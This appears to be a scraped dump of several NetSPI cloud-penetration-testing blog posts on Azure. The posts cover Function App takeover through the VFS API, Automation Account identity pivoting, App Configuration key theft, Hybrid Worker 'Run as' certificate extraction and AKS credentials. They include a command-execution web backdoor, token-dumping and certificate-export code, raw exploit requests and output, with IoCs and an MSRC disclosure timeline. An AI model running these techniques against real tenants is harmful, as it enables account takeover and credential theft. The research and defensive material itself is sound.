# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: ",$cmdoutput)) 
} 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 

To overwrite the function, we will use Burp Suite to send a PUT request with our new code. Before we do that, we need to make an initial request for the function code to get the associated ETag to use with the PUT request.

Initial GET of the Function Code:

GET /admin/vfs/home/site/wwwroot/HttpTrigger1/run.ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 

HTTP/1.1 200 OK 
Content-Type: application/octet-stream 
Date: Wed, 21 Sep 2022 23:29:01 GMT 
Server: Kestrel 
ETag: "38aaebfb279cda08" 
Last-Modified: Wed, 21 Sep 2022 23:21:17 GMT 
Content-Length: 852 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 
[Truncated] 
}) 

PUT Overwrite Request Using the ETag as the "If-Match" Header:

PUT /admin/vfs/home/site/wwwroot/HttpTrigger1/run.ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 
Content-Length: 851 
If-Match: "38aaebfb279cda08" 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function processed a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: ",$cmdoutput)) 
} 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 


HTTP Response: 

HTTP/1.1 204 No Content 
Date: Wed, 21 Sep 2022 23:32:32 GMT 
Server: Kestrel 
ETag: "c243578e299cda08" 
Last-Modified: Wed, 21 Sep 2022 23:32:32 GMT

The server should respond with a 204 No Content, and an updated ETag for the file. With our newly updated function, we can start executing commands. 

Sample URL: 

https://vfspoc2.azurewebsites.net/api/HttpTrigger1?name=whoami&code=Q[REDACTED]= 

Browser Output: 

Browser output for the command "whoami."

Now that we have full control over the Function App container, we can potentially make use of any attached Managed Identities and generate tokens for them. In our case, we will just add the following PowerShell code to the function to set the output to the management token we’re trying to export. 

$resourceURI = "https://management.azure.com" 
$tokenAuthURI = $env:IDENTITY_ENDPOINT + "?resource=$resourceURI&api-version=2019-08-01" 
$tokenResponse = Invoke-RestMethod -Method Get -Headers @{"X-IDENTITY-HEADER"="$env:IDENTITY_HEADER"} -Uri $tokenAuthURI 
$body = $tokenResponse.access_token

Example Token Exported from the Browser: 

Example token exported from the browser.

For more information on taking over Azure Function Apps, check out this fantastic post by Bill Ben Haim and Zur Ulianitzky: 10 ways of gaining control over Azure function Apps.  

Conclusion 

Let's recap the issue:  

  1. Start as a user with the Reader role on a Function App. 
  2. Abuse the undocumented VFS API to read arbitrary files from the containers.
  3. Access encryption keys on the Windows containers or access the “proc” files from the Linux containers.
  4. Using the Linux container, read the process environment variables. 
  5. Use the variables to access configuration information in a SAS token URL. 
  6. Decrypt the configuration information with the variables. 
  7. Use the keys exposed in the configuration information to overwrite the function and gain command execution in the Linux container. 

All this being said, we submitted this issue through MSRC, and they were able to remediate the file access issues. The APIs are still there, so you may be able to get access to some of the Function App container and application files with the appropriate role, but the APIs are now restricted for the Reader role. 

MSRC Timeline

The initial disclosure for this issue, focusing on Windows containers, was sent to MSRC on Aug 2, 2022. A month later, we discovered the additional impact related to the Linux containers and submitted a secondary ticket, as the impact was significantly higher than initially discovered and the different base container might require a different remediation.  

There were a few false starts on the remediation date, but eventually the vulnerable API was restricted for the Reader role on January 17, 2023. On January 24, 2023, Microsoft rolled back the fix after it caused some issues for customers. 

On March 6, 2023, Microsoft reimplemented the fix to address the issue. The rollout was completed globally on March 8. At the time of publishing, the Reader role no longer has the ability to read files with the Function App VFS APIs. It should be noted that the Linux escalation path is still a viable option if an attacker has command execution on a Linux Function App. 

Pivoting with Azure Automation Account Connections

Intro 

Azure Automation Accounts are a frequent topic on the NetSPI technical blog, to the point that we compiled our research into a presentation for the DEFCON 30 Cloud Village and the Azure Cloud Security Meetup Group. We're always trying to find new ways to leverage Automation Accounts during cloud penetration testing. To automate enumerating our privilege escalation options, we looked at how Automation Accounts handle authenticating as other accounts within a runbook, and how we can abuse those authentication connections to pivot to other Azure resources.

Passing the Identity in Azure Active Directory 

As a primer: an Azure Active Directory (AAD) identity (User, App Registration, or Managed Identity) can have a role (e.g., Contributor) on an Automation Account that allows it to modify the account. The Automation Account can have attached identities that allow the account to authenticate to Azure AD as those identities. Once authenticated as an attached identity, the Automation Account runbook code will run any Azure commands in the context of that identity. If that identity has additional (or different) permissions from those of the AAD user writing the runbook, the AAD user can abuse those permissions to escalate or move laterally.

Simply put, Contributor on the Automation Account allows an attacker to be any identity attached to the Automation Account. These attached identities can have additional privileges, leading to a privilege escalation for the original Contributor account. 

Available Identities for Azure Automation Accounts 

There are two types of identities available for Automation Accounts: Run As Accounts and Managed Identities. The Run As Accounts will be deprecated on September 30, 2023, but they have been a source of several issues since they were introduced. When initially created, a Run As Account will be granted the Contributor role on the subscription it is created in.  

These accounts are also App Registrations in Azure Active Directory that use certificates for authentication. These certificates can be extracted from Automation Accounts with a runbook and used for gaining access to the Run As Account. This is also helpful for persistence, as App Registrations typically don’t have conditional access restrictions applied. 
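
A minimal sketch of that extraction, assuming the default certificate name inside a runbook, might look like this:

# Export the Run As certificate from inside a runbook and Base64 it for exfil
$cert = Get-AutomationCertificate -Name "AzureRunAsCertificate"
$pfx = $cert.Export([System.Security.Cryptography.X509Certificates.X509ContentType]::Pfx, "password")
[Convert]::ToBase64String($pfx)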

For more on Azure Privilege Escalation using Managed Identities, check out this blog.

Screenshot of the Run As account type, one of two identities available for Azure Automation Accounts.

Managed Identities are the currently recommended option for using an execution identity in Automation Account runbooks. Managed Identities can either be system-assigned or user-assigned. System-assigned identities are tied to the resource that they are created for and cannot be shared between resources. User-assigned Managed Identities are a subscription level resource that can be shared across resources, which is handy for situations where resources, like multiple App Services applications, require shared access to a specific resource (Storage Account, Key Vault, etc.). Managed Identities are a more secure option for Automation Account Identities, as their access is temporary and must be generated from the attached resource.

A description of a system-assigned identity in Azure Automation Account.

Since Automation Accounts are frequently used to automate actions in multiple subscriptions, they are often granted roles in other subscriptions, or on higher level management groups. As attackers, we like to look for resources in Azure that can allow for pivoting to other parts of an Azure tenant. To help in automating this enumeration of the identity privileges, we put together a PowerShell script. 

Automating Privilege Enumeration 

The Get-AzAutomationConnectionScope function in MicroBurst is a relatively simple PowerShell script that uses the following logic:

  • Get a list of available subscriptions 
  • For each selected subscription: 
    • Get a list of available connections (Run As or Managed Identity) 
    • Build the Automation Account runbook to authenticate as the connection and list the available subscriptions and Key Vaults 
    • Upload and run the runbook 
    • Retrieve the output and return it
    • Delete the runbook 

In general, we are going to create a "malicious" automation runbook that goes through all the available identities in the Automation Account to tell us the available subscriptions and Key Vaults. Since the Key Vaults utilize a secondary access control mechanism (Access Policies), the script will also review the policies for each available Key Vault and report back any that have entries for our current identity. While a Contributor on a Key Vault can change these Access Policies, it is helpful to know which identities already have Key Vault access. 
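
A stripped-down sketch of the kind of runbook the function uploads is shown below, covering the Managed Identity case (the Run As case uses certificate-based authentication instead):

# Authenticate as the attached identity, then enumerate what it can see
Connect-AzAccount -Identity | Out-Null
Get-AzSubscription | ForEach-Object { Write-Output ("Available Subscription: " + $_.Name) }
Get-AzKeyVault | ForEach-Object { Write-Output ("Available Key Vault: " + $_.VaultName) }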

The usage of the script is simple. Just authenticate to the Az PowerShell module (Connect-AzAccount) as a Contributor on an Automation Account and run “Get-AzAutomationConnectionScope”. The verbose flag is very helpful here, as runbooks can take a while to run, and the verbose status update is nice.

PowerShell script for automating the enumeration of identity privileges.

Note that this will also work for cross-tenant Run As connections. As a proof of concept, we created a Run As account in another tenant (see “Automation Account Connection – dso” above), uploaded the certificate and authentication information (Application ID and Tenant) to our Automation Account, and the connection was usable with this script. This can be a convenient way to pivot to other tenants that your Automation Account is responsible for. That said, it's rare for us to see a cross-tenant connection like that.

As a final note, the "Classic Run As" connections in older Automation Accounts will not work with this script. They may show up in your output, but they require additional authentication logic in the runbook, and given the low likelihood of their usage, we've opted not to add the logic for those connections. 

Indicators of Compromise 

To help out the Azure defenders, here is a rough outline on how this script would look in a subscription/tenant from an incident response perspective: 

  1. Initial Account Authentication 
     a. User/App Registration authenticates via the Az PowerShell cmdlets 
  2. Subscriptions / Automation Accounts Enumerated 
     a. The script has you select an available subscription to test, then lists the available Automation Accounts to select from 
  3. Malicious Runbook draft is created in the Automation Account
     a. Microsoft.Automation/automationAccounts/runbooks/write
     b. Microsoft.Automation/automationAccounts/runbooks/draft/write 
  4. Malicious Runbook is published to the Automation Account
     a. Microsoft.Automation/automationAccounts/runbooks/publish/action 
  5. Malicious Runbook is executed as a job
     a. Microsoft.Automation/automationAccounts/jobs/write 
  6. Run As connections and/or Managed Identities should show up as authentication events 
  7. Malicious Runbook is deleted from the Automation Account
     a. Microsoft.Automation/automationAccounts/runbooks/delete 

Providing the full rundown is a little beyond the scope of this blog, but Lina Lau (@inversecos) has a great blog on detections for Automation Accounts that covers a persistence technique outlined in my previous article, Maintaining Azure Persistence via Automation Accounts. Lina’s blog should also cover most of the steps that we have outlined above. 

For additional detail on Automation Account attack paths, take a look at Andy Robbins’ blog, Managed Identity Attack Paths, Part 1: Automation Accounts. 

Conclusion 

While Automation Account identities are often a necessity for automating actions in an Azure tenant, they can allow a user (with the correct role) to abuse the identity permissions to escalate and/or pivot to other subscriptions.

The function outlined in this blog should be helpful for enumerating potential pivot points from an existing Automation Account where you have Contributor access. From here, you could create custom runbooks to extract credentials, or pivot to Virtual Machines that your identity has access to. Alternatively, defenders can use this script to see the potential blast radius of a compromised Automation Account in their subscriptions. 

Ready to improve your Azure security? Explore NetSPI’s Azure Cloud Penetration Testing solutions, or check out our other blog posts for more in-depth research on Azure Automation Accounts.  


Most Azure environments that we test contain multiple kinds of application hosting services (App Services, AKS, etc.). As these applications grow and scale, we often find that the application configuration parameters will be shared between the multiple apps. To help with this scaling challenge, Microsoft offers the Azure App Configuration service. The service allows Azure users to create key-value pairs that can be shared across multiple application resources. In theory, this is a great way to share non-sensitive configuration values across resources. In practice, we see these configurations expose sensitive information to users with permission to read the values.

TL;DR

The Azure App Configuration service can often hold sensitive data values. This blog post outlines gathering and using access keys for the service to retrieve the configuration values.

What are App Configurations?

The App Configuration service is simple: provide an Id and Secret to an “azconfig.io” endpoint, and get back a list of key-value pairs that integrate into your application environment. This is a convenient way to share configuration information across multiple applications, but we have frequently found sensitive information (keys, passwords, connection strings) in these configuration values. This is a known problem, as Microsoft specifically calls out secret storage in their documentation, noting Key Vaults as the recommended secure solution.

Gathering Access Keys

Within the App Configuration service, two kinds of access keys (Read-write and Read-only) can be used for accessing the service and the configuration values. Additionally, Read-write keys allow you to change the stored values, so access to these keys could allow for additional attacks on applications that take action on these values. For example, by modifying a stored value for an “SMBSHAREHOST” parameter, we might be able to force an application to initiate an SMB connection to a host that we control. This is just one example, but depending on how these values are utilized, there is potential for further attacks. 

Regardless of the type of key an attacker acquires, either one grants access to the configuration values. Much like the other key-based authentication services in Azure, you are also able to regenerate these keys. This is particularly useful if your keys are ever unintentionally exposed.

To read these keys, you will need Contributor role access to the resource or access to a role with the “Microsoft.AppConfiguration/configurationStores/ListKeys/action” action.

From the portal, you can copy out the connection string directly from the “Access keys” menu.

An example of the portal in an App Configuration service.

This connection string will contain the Endpoint, Id, and Secret, which can all be used together to access the service.

Alternatively, using the Az PowerShell cmdlets, we can list out the available App Configurations (Get-AzAppConfigurationStore) and for each configuration store, we can get the keys (Get-AzAppConfigurationStoreKey). This process is also automated by the Get-AzPasswords function in MicroBurst with the “AppConfiguration” flag.
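
As a rough sketch of that enumeration flow (hedged, since output shapes can vary by Az.AppConfiguration module version; the resource group name is parsed out of the store’s resource Id):

# Sketch: list each App Configuration store in the subscription, then pull its
# access keys (requires the ListKeys action noted below)
Get-AzAppConfigurationStore | ForEach-Object {
    $rg = ($_.Id -split '/')[4]    # resource group name parsed from the resource Id
    Get-AzAppConfigurationStoreKey -Name $_.Name -ResourceGroupName $rg |
        Select-Object Name, ConnectionString
}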

An example of an app configuration access key found in public data sources.

Finally, if you don’t have initial access to an Azure subscription to collect these access keys, we have found App Configuration connection strings in web applications (via directory traversal/local file include attacks) and in public GitHub repositories. A cursory search of public data sources results in a fair number of hits, so there are a few access keys floating around out there.

Using the Keys

Typically, these connection strings are tied to an application environment, so the code environment makes the calls out to Azure to gather the configurations. When initially looking into this service, we used a Microsoft Learn example application with our connection string and proxied the application traffic to look at the request out to azconfig.io.

This initial look into the azconfig.io API calls showed that we needed to use the Id and Secret to sign the requests with a SHA256-HMAC signature. Conveniently, Microsoft provides documentation on how we can do this. Using this sample code, we added a new function to MicroBurst to make it easier to request these configurations.
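
A hedged sketch of that signing scheme is below; the endpoint, Id, and Secret are placeholders pulled from a connection string, and the header and string-to-sign formats follow Microsoft’s published sample code:

$endpoint = "https://<store-name>.azconfig.io"   # placeholder endpoint
$id       = "<Id>"                               # Credential from the connection string
$secret   = "<Secret>"                           # Base64 secret from the connection string

$uri  = [System.Uri]"$endpoint/kv?api-version=1.0"
$date = [DateTime]::UtcNow.ToString("R")

# SHA256 hash of the (empty) GET request body
$contentHash = [Convert]::ToBase64String(
    [Security.Cryptography.SHA256]::Create().ComputeHash([byte[]]@()))

# String-to-sign: METHOD, path and query, then date;host;content hash
$stringToSign = "GET`n$($uri.PathAndQuery)`n$date;$($uri.Host);$contentHash"

$hmac = New-Object System.Security.Cryptography.HMACSHA256
$hmac.Key  = [Convert]::FromBase64String($secret)
$signature = [Convert]::ToBase64String(
    $hmac.ComputeHash([Text.Encoding]::ASCII.GetBytes($stringToSign)))

$headers = @{
    "x-ms-date"           = $date
    "x-ms-content-sha256" = $contentHash
    "Authorization"       = "HMAC-SHA256 Credential=$id&SignedHeaders=x-ms-date;host;x-ms-content-sha256&Signature=$signature"
}
Invoke-RestMethod -Uri $uri -Headers $headers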

The Get-AzAppConfiguration function (in the “Misc” folder) can be used with the connection string to dump all the configuration values from an App Configuration.

A list of configuration values from the Get-AzAppConfiguration function.

In our example, I just have “test” values for the keys. As noted above, if you have the Read-write key for the App Configuration, you will be able to modify the values of any of the keys that are not set to “locked”. Depending on how these configuration values are interpreted by the application, this could lead to some pivoting opportunities.

IoCs

Since we just provided some potential attack options, we also wanted to call out any IoCs that you can use to detect an attacker going after your App Configurations:

  • Azure Activity Log - List Access Keys
    • Category – “Administrative”
    • Action – “Microsoft.AppConfiguration/configurationStores/ListKeys/action”
    • Status – “Started”
    • Caller – <UPN of account listing keys>
An example of an app configuration audit log, capturing details of the account used to access data.
  • App Configuration Service Logs

Conclusions

We showed you how to gather access keys for App Configuration resources and how to use those keys to access the configuration key-value pairs. This will hopefully give Azure pentesters something to work with if they run into an App Configuration connection string, and give defenders areas to review to help secure their configuration environments.

For those using Azure App Configurations, make sure that you are not storing any sensitive information within your configuration values. Key Vaults are a much better solution for this and will give you additional protections (Access Policies and logging) that you don’t have with App Configurations. Finally, you can also disable access key authentication for the service and rely on Azure Active Directory (AAD) for authentication. Depending on the configuration of your environment, this may be a more secure configuration option.
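
If you do go the AAD-only route, disabling access key authentication is a resource-level setting. A hedged one-liner follows; the store and resource group names are placeholders, and the parameter name is taken from the Az.AppConfiguration documentation, so verify it against your module version:

# Sketch: turn off access key (local) authentication for a store
Update-AzAppConfigurationStore -Name "<store-name>" -ResourceGroupName "<rg-name>" -DisableLocalAuth:$true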

Need help testing your Azure app configurations? Explore NetSPI’s Azure cloud penetration testing.

[post_title] => How to Gather Azure App Configurations [post_excerpt] => Learn how to gather access keys for App Configuration resources and how to use those keys to access the configuration key-value pairs. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gathering-azure-app-configurations [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:18:32 [post_modified_gmt] => 2023-03-16 14:18:32 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28955 [menu_order] => 114 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [4] => WP_Post Object ( [ID] => 27487 [post_author] => 10 [post_date] => 2022-03-17 08:00:00 [post_date_gmt] => 2022-03-17 13:00:00 [post_content] =>

On the NetSPI blog, we often focus on Azure Automation Accounts. They offer a fair amount of attack surface area during cloud penetration tests and are a great source for privilege escalation opportunities.  

During one of our recent Azure penetration testing assessments, we ran into an environment that was using Automation Account Hybrid Workers to run automation runbooks on virtual machines. Hybrid Workers are an alternative to the traditional Azure Automation Account container environment for runbook execution. Outside of the “normal” runbook execution environment, automation runbooks need access to additional credentials to interact with Azure resources. This can lead to a potential privilege escalation scenario that we will cover in this blog.

TL;DR

Azure Hybrid Workers can be configured to use Automation Account “Run as” accounts, which can expose the credentials to anyone with local administrator access to the Hybrid Worker. Since “Run as” accounts are typically subscription contributors, this can lead to privilege escalation from multiple Azure Role-Based Access Control (RBAC) roles.

What are Azure Hybrid Workers?

For those that need more computing resources (CPU, RAM, Disk, Time) to run their Automation Account runbooks, there is an option to add Hybrid Workers to an Automation Account. These Hybrid Workers can be Azure Virtual Machines (VMs) or Arc-enabled servers, and they allow for additional computing flexibility over the normal limitations of the Automation Account hosted environment. Typically, I’ve seen Hybrid Workers as Windows-based Azure VMs, as that’s the easiest way to integrate with the Automation Account runbooks. 

Add Hybrid Workers to an Automation Account

In this article, we’re going to focus on instances where the Hybrid Workers are Windows VMs in Azure. They’re the most common configuration that we run into, and the Linux VMs in Azure can’t be configured to use the “Run as” certificates, which are the target of this blog.

The easiest way to identify Automation Accounts that use Hybrid Workers is to look at the “Hybrid worker groups” section of an Automation Account in the portal. We will be focusing on the “User” groups, versus the “System” groups for this post. 


Additionally, you can use the Az PowerShell cmdlets to identify the Hybrid Worker groups, or you can enumerate the VMs that have the “HybridWorkerExtension” VM extension installed. I’ve found this last method is the most reliable for finding potentially vulnerable VMs to attack.
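
A hedged sketch of that last method follows; the wildcard filter is based on the extension name noted above, so adjust it if your environment uses a different extension name:

# Sketch: flag VMs that have the Hybrid Worker extension installed
Get-AzVM | ForEach-Object {
    $vm  = $_
    $ext = Get-AzVMExtension -ResourceGroupName $vm.ResourceGroupName -VMName $vm.Name -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -like "*HybridWorker*" }
    if ($ext) { $vm.Name }
}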

Additional Azure Automation Accounts Research:

Running Jobs on the Workers

To run jobs on the Hybrid Worker group, you can modify the “Run settings” in any of your runbook execution options (Schedules, Webhook, Test Pane) to “Run on” the Hybrid Worker group.


When the runbook code is executed on the Hybrid Worker, it is run as the “NT AUTHORITY\SYSTEM” account in Windows, or “root” in Linux. If an Azure AD user has a role (Automation Contributor) with Automation Account permissions, and no VM permissions, this could allow them to gain privileged access to VMs.

We will go over this in greater detail in part two of this blog, but Hybrid Workers utilize an undocumented internal API to poll for information about the Automation Account (Runbooks, Credentials, Jobs). As part of this, the Hybrid Workers are not supposed to have direct access to the certificates that are used as part of the traditional “Run As” process. As you will see in the following blog, this isn’t totally true.

To make up for the lack of immediate access to the “Run as” credentials, Microsoft recommends exporting the “Run as” certificate from the Automation Account and installing it on each Hybrid Worker in the group of workers. Once installed, the “Run as” credential can then be referenced by the runbook to authenticate as the app registration.

If you have access to an Automation Account, keep an eye out for any lingering “Export-RunAsCertificateToHybridWorker” runbooks that may indicate the usage of the “Run as” certificates on the Hybrid Workers.


The issue with installing these “Run As” certificates on the Hybrid Workers is that anyone with local administrator access to the Hybrid Worker can extract the credential and use it to authenticate as the “Run as” account. Given that “Run as” accounts are typically configured with the Contributor role at the subscription scope, this could result in privilege escalation.

Extracting “Run As” Credentials from Hybrid Workers

We have two different ways of accessing Windows VMs in Azure: direct authentication (local or domain accounts) and platform-level command execution (VM Run Command in Azure). Since there are a million different ways that someone could gain access to credentials with local administrator rights, we won’t be covering standard Windows authentication. Instead, we will briefly cover the multiple Azure RBAC roles that allow for various ways of command execution on Azure VMs.

Affected Roles:

Where noted above (VM Extension Rights), the VM Extension command execution method comes from the following NetSPI blog: Attacking Azure with Custom Script Extensions.

Since the above roles are not the full Contributor role on the subscription, it is possible for someone with one of the above roles to extract the “Run as” credentials from the VM (see below) to escalate to a subscription Contributor. This is a somewhat similar escalation path to the one that we previously called out for the Log Analytics Contributor role.

Exporting the Certificate from the Worker

As a local administrator on the Hybrid Worker VM, it’s fairly simple to export the certificate. With Remote Desktop Protocol (RDP) access, we can just manually go into the certificate manager (certmgr), find the “Run as” certificate, and export it to a pfx file.

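
In script form, the manual export looks roughly like the following; run it from an elevated session on the worker. The Subject filter matches the DC=<name> naming convention seen on “Run as” certificates, and the export password is a placeholder:

# Sketch: export the "Run as" certificate from the local machine store
# (only succeeds if the private key was installed as exportable)
$cert = Get-ChildItem Cert:\LocalMachine\My |
    Where-Object { $_.Subject -like "DC=*" } | Select-Object -First 1
$pw   = ConvertTo-SecureString "PlaceholderExportPassword" -AsPlainText -Force
Export-PfxCertificate -Cert $cert -FilePath .\RunAsExport.pfx -Password $pw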

At this point we can copy the file from the Hybrid Worker to use for authentication on another system. Since this is a bit tedious to do at scale, we’ve automated the whole process with a PowerShell script.

Automating the Process

The following script is in the MicroBurst repository under the “Az” folder:

https://github.com/NetSPI/MicroBurst/blob/master/Az/Invoke-AzHybridWorkerExtraction.ps1

This script will enumerate any running Windows virtual machines configured with the Hybrid Worker extension and will then run commands on the VMs (via Invoke-AzVMRunCommand) to export the available private certificates. Assuming the Hybrid Worker is only configured with one exportable private certificate, this will return the certificate as a Base64 string in the run command output.

PS C:\temp\hybrid> Invoke-AzHybridWorkerExtraction -Verbose
VERBOSE: Logged In as kfosaaen@notarealdomain.com
VERBOSE: Getting a list of Hybrid Worker VMs
VERBOSE: 	Running extraction script on the HWTest virtual machine
VERBOSE: 		Looking for the attached App Registration... This may take a while in larger environments
VERBOSE: 			Writing the AuthAs script
VERBOSE: 		Use the C:\temp\HybridWorkers\AuthAsNetSPI_tester_[REDACTED].ps1 script to authenticate as the NetSPI_sQ[REDACTED]g= App Registration
VERBOSE: 	Script Execution on HWTest Completed
VERBOSE: Run as Credential Dumping Activities Have Completed

The script will then write this Base64 certificate data to a file and use the resulting certificate thumbprint to match against App Registration credentials in Azure AD. This will allow the script to find the App Registration Client ID that is needed to authenticate with the exported certificate.

Finally, this will create an “AuthAs” script (noted in the output) that can be used to authenticate as the “Run as” account, with the exported private certificate.

PS C:\temp\hybrid> ls | select Name, Length
Name                                        Length
----                                        ------
AuthAsNetSPI_tester_[Redacted_Sub_ID].ps1   1018
NetSPI_tester_[Redacted_Sub_ID].pfx         2615

This script can be run with any RBAC role that has VM “Run Command” rights on the Hybrid Workers to extract out the “Run as” credentials.

Authenticating as the “Run As” Account

Now that we have the certificate, we can use the generated script to authenticate to the subscription as the “Run As” account. This is very similar to what we do with exporting credentials in the Get-AzPasswords function, so this may look familiar.

PS C:\temp\hybrid> .\AuthAsNetSPI_tester_[Redacted_Sub_ID].ps1
   PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My
Thumbprint                                Subject
----------                                -------
BDD023EC342FE04CC1C0613499F9FF63111631BB  DC=NetSPI_tester_[Redacted_Sub_ID]

Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud], [AzureUSGovernment, AzureUSGovernment]}
Context      : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext

PS C:\temp\hybrid> (Get-AzContext).Account                                                                               
Id                    : 52[REDACTED]57
Type                  : ServicePrincipal
Tenants               : {47[REDACTED]35}
Credential            :
TenantMap             : {}
CertificateThumbprint : BDD023EC342FE04CC1C0613499F9FF63111631BB
ExtendedProperties    : {[Subscriptions, d4[REDACTED]b2], [Tenants, 47[REDACTED]35], [CertificateThumbprint, BDD023EC342FE04CC1C0613499F9FF63111631BB]}
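
For reference, the core of a generated “AuthAs” script boils down to a certificate import plus a service principal login. A hedged approximation follows; the file path, tenant Id, and application (client) Id are placeholders, and a -Password parameter may be needed if the PFX is password-protected:

# Sketch: import the exported PFX, then authenticate as the App Registration
$pfx = Import-PfxCertificate -FilePath .\ExportedRunAs.pfx -CertStoreLocation Cert:\LocalMachine\My
Connect-AzAccount -ServicePrincipal -Tenant "<tenant-id>" -ApplicationId "<app-client-id>" `
    -CertificateThumbprint $pfx.Thumbprint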

Alternative Options

Finally, any user with the ability to run commands as “NT AUTHORITY\SYSTEM” on the Hybrid Workers is also able to assume the authenticated Azure context that results from authenticating (Connect-AzAccount) to Azure while running a job as a Hybrid Worker. 

This would result in users being able to run Az PowerShell module functions as the “Run as” account via the Azure “Run command” and “Extension” features that are available to many of the roles listed above. Assuming the “Connect-AzAccount” function was previously used with a runbook, an attacker could just use the run command feature to run other Az module functions with the “Run as” context.

Additionally, since the certificate is installed on the VM, a user could just use the certificate to directly authenticate from the Hybrid Worker, if there was no active login context.
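
A hedged sketch of that approach via the run command feature is below; the resource names are placeholders, and this only pays off if a runbook previously left an authenticated context behind on the worker:

# Sketch: run an Az call as SYSTEM on the Hybrid Worker and check for a
# leftover authenticated context from a previous runbook job
'Get-AzContext | ConvertTo-Json' | Out-File -FilePath .\contextcheck.ps1
Invoke-AzVMRunCommand -ResourceGroupName "<worker-rg>" -VMName "<hybrid-worker-vm>" `
    -CommandId "RunPowerShellScript" -ScriptPath .\contextcheck.ps1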

Summary

In conjunction with the issues outlined in part two of this blog, we submitted our findings to MSRC.

Since this issue ultimately relies on an Azure administrator giving a user access to specific VMs (the Hybrid Workers), it’s considered a user misconfiguration issue. Microsoft has updated their documentation to reflect the potential impact of installing the “Run as” certificate on the VMs. You could also modify the certificate installation process to mark the certificates as “non-exportable” to help protect them.


We would recommend against using “Run as” accounts for Automation Accounts and instead switch to using managed identities on the Hybrid Worker VMs.

Stay tuned to the NetSPI technical blog for the second half of this series that will outline how we were able to use a Reader role account to extract credentials and certificates from Automation Accounts. In subscriptions where Run As accounts were in use, this resulted in a Reader to Contributor privilege escalation.

Prior Work

While we were working on these blogs, the Azsec blog put out the “Laterally move by abusing Log Analytics Agent and Automation Hybrid worker” post that outlines some similar techniques to what we’ve outlined above. Read the post to see how they make use of Log Analytics to gain access to the Hybrid Worker groups.

[post_title] => Abusing Azure Hybrid Workers for Privilege Escalation – Part 1 [post_excerpt] => In this cloud penetration testing blog, learn how to abuse Azure Hybrid Workers for privilege escalation. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => abusing-azure-hybrid-workers-for-privilege-escalation [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:20:54 [post_modified_gmt] => 2023-03-16 14:20:54 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27487 [menu_order] => 234 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 27255 [post_author] => 10 [post_date] => 2022-01-27 09:00:00 [post_date_gmt] => 2022-01-27 15:00:00 [post_content] =>

As more applications move to a container-based model, we are running into more instances of Azure Kubernetes Services (AKS) being used in Azure subscriptions. The service itself can be complicated and have a large attack surface area. In this post we will focus on how to extract credentials from the AKS service in Azure, using the Contributor role permissions on an AKS cluster.

While we won’t explain how Kubernetes works, we will use some common terms throughout this post. It may be helpful to have this Kubernetes glossary open in another tab for reference. Additionally, we will not cover how to collect the Kubernetes “Secrets” from the service or how to review pods/containers for sensitive information. We’ll save those topics for a future post.

What is Azure Kubernetes Service (AKS)?

In the simplest terms, the AKS service is an Azure resource that allows you to run a Kubernetes cluster in Azure. When created, the AKS cluster resource consists of sub-resources (in a special resource group) that support running the cluster. These sub-resources, and attached cluster, allow you to orchestrate containers and set up Kubernetes workloads. As a part of the orchestration process, the cluster needs to be assigned an identity (a Service Principal or a Managed Identity) in the Azure tenant. 

Service Principal versus Managed Identity

When provisioning an AKS cluster, you will have to choose between authenticating with a Service Principal or a System-assigned Managed Identity. By default, the Service Principal that is assigned to the cluster will get the ACRPull role assigned at the subscription scope level. While it’s not a guarantee, by using an existing Service Principal, the attached identity may also have additional roles already assigned in the Azure tenant.

In contrast, a newly created System-assigned Managed Identity on an AKS cluster will not have any assigned roles in a subscription. To further complicate things, the “System-assigned” Managed Identity is actually a “User-assigned” Managed Identity that’s created in the new Resource Group for the Virtual Machine Scale Set (VMSS) cluster resources. There’s no “Identity” menu in the AKS portal blade, so it’s my understanding that the User-assigned Managed Identity is what gets used in the cluster. Each of these authentication methods has its benefits, and we will have different approaches to attacking each one.

Cluster Infrastructure

In order to access the credentials (Service Principal or Managed Identity) associated with the cluster, we will need to execute commands on the cluster. This can be done by using an authenticated kubectl session (which we will explore in the Gathering kubectl Credentials section), or by executing commands directly on the VMSS instances that support the cluster. 

When a new cluster is created in AKS, a new resource group is created in the subscription to house the supporting resources. This new resource group is named after the resource group that the AKS resource was created under, and the name of the cluster. 

For example, a cluster named “testCluster” that was deployed in the East US region and in the “tester” resource group would have a new resource group that was created named “MC_tester_testCluster_eastus”.

This resource group will contain the VMSS, some supporting resources, and the Managed Identities used by the cluster.

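
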